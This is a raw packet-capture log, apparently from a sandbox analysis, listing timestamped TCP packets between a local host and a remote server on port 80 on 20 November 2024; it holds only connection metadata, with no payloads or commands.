                                                                                                            Nov 20, 2024 16:57:26.891113043 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.891127110 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:26.891140938 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.891154051 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.891166925 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.891180038 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.891191959 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.891204119 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.891290903 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:26.891292095 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:26.891292095 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:26.891292095 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:26.892702103 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:26.897555113 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.010790110 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.010862112 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.010864019 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.010946989 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.015068054 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.015121937 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.103904963 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.104008913 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.104314089 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.107947111 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.108019114 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.108048916 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.108102083 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.116266966 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.116373062 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.117398024 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.117436886 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.117470980 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.117507935 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.124914885 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.125015974 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.125127077 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.125185013 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.136228085 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.136266947 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.136311054 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.136311054 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.144565105 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.144675016 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.145045996 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.145117044 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.152971029 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.153043032 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.153477907 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.153542042 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.161382914 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.161485910 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.161648989 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.161709070 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.169784069 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.169855118 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.169924974 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.169965982 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.178100109 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.178195953 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.178225994 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.178287029 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.186384916 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.186455965 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.186984062 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.187026978 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.224056959 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.224133015 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.311445951 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.311592102 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.311618090 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.311757088 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.314465046 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.314537048 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.666413069 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.669833899 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.670152903 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.670290947 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.670290947 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.673196077 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.673247099 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.673310995 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.673352957 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.676572084 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.676625013 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.676747084 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.676784992 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.680134058 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.680186033 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.732561111 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.732580900 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.732642889 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.733788967 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.733841896 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.734077930 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.734123945 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.736502886 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.736641884 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.736684084 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.736737013 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.739197969 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.739279032 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.739372015 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.739427090 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.741946936 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.742018938 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.742022991 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.742065907 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.744635105 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.744704008 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.744815111 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.744868994 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.747271061 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.747334003 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.748378038 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.748435020 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.749881983 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.749941111 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.750015020 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.750066042 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.752554893 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.752624035 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.752688885 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.752746105 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.755228043 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.755296946 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.755337954 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.755387068 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.759716988 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.759788990 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.764108896 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.764156103 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.764194965 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.764202118 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.764202118 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.764238119 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.766658068 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.766732931 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.767194986 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.767250061 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.768906116 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.768980026 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.769428015 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.769490004 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.771457911 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.771528959 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.772258043 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.772324085 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.774976969 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.775048971 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.775511026 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.775566101 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.777478933 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.777559042 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.778146982 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.778208017 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.780229092 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.780304909 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.781496048 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.781577110 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.782946110 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.783011913 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.783423901 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.783479929 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.784565926 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.784641027 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.784744024 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.784802914 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.786434889 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.786480904 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.786756992 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.786804914 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.788161993 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.788202047 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.788218975 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.788249969 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.789868116 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.789932013 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.790191889 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.790241003 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.791548014 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.791620016 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.792488098 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.792555094 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.793462038 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.793499947 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.793519020 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.793536901 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.795160055 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.795224905 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.795340061 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.795391083 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.796659946 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.796708107 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.796811104 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.796849012 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.798279047 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.798333883 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.799352884 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.799407005 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.799446106 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.799480915 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.799493074 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.799521923 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.799525023 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.799561977 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.799571037 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.799604893 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.799720049 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.799763918 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.800009966 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.800055027 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.806193113 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.806272984 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.806489944 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.806535959 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.806852102 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.806886911 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.806900024 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.806929111 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.808645010 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.808681011 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.808717966 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.809608936 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.809644938 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.809669018 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.811849117 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.811918020 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.812299967 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.812354088 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.812742949 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.812791109 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.813656092 CET8049166192.3.220.29192.168.2.22
Nov 20, 2024 16:57:27.813707113 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.814608097 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.814671040 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.815335989 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.815385103 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.815768003 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.815815926 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.817047119 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.817101955 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.817219019 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.817318916 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.818731070 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.818783998 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.819379091 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.819428921 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.819843054 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.819891930 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.819977999 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.820023060 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.820887089 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.820921898 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.820943117 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.820960045 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.821964979 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.822017908 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.822741032 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.822793961 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.822894096 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.822932005 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.822946072 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.822974920 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.824803114 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.824872017 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.824951887 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.824995995 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.826565027 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.826628923 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.827028036 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.827102900 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.828140020 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.828198910 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.828773975 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.828839064 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.829885006 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.829955101 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.830174923 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.830233097 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.831585884 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.831657887 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.831726074 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.831779003 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.833327055 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.833398104 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.833777905 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.833836079 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.835057974 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.835119963 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.835180044 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.835237980 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.836683989 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.836744070 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.838354111 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.943783045 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.943841934 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.943958044 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.943958998 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.944159985 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.944304943 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.944772959 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.944838047 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.945900917 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.945974112 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.946203947 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.946268082 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.947020054 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.947033882 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.947133064 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.947657108 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.947717905 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.949044943 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.949058056 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.949069977 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.949096918 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.949129105 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.950268984 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.950280905 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.950325012 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.950325012 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.952003002 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.952017069 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.952066898 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.953211069 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.953226089 CET  80     49166  192.3.220.29  192.168.2.22
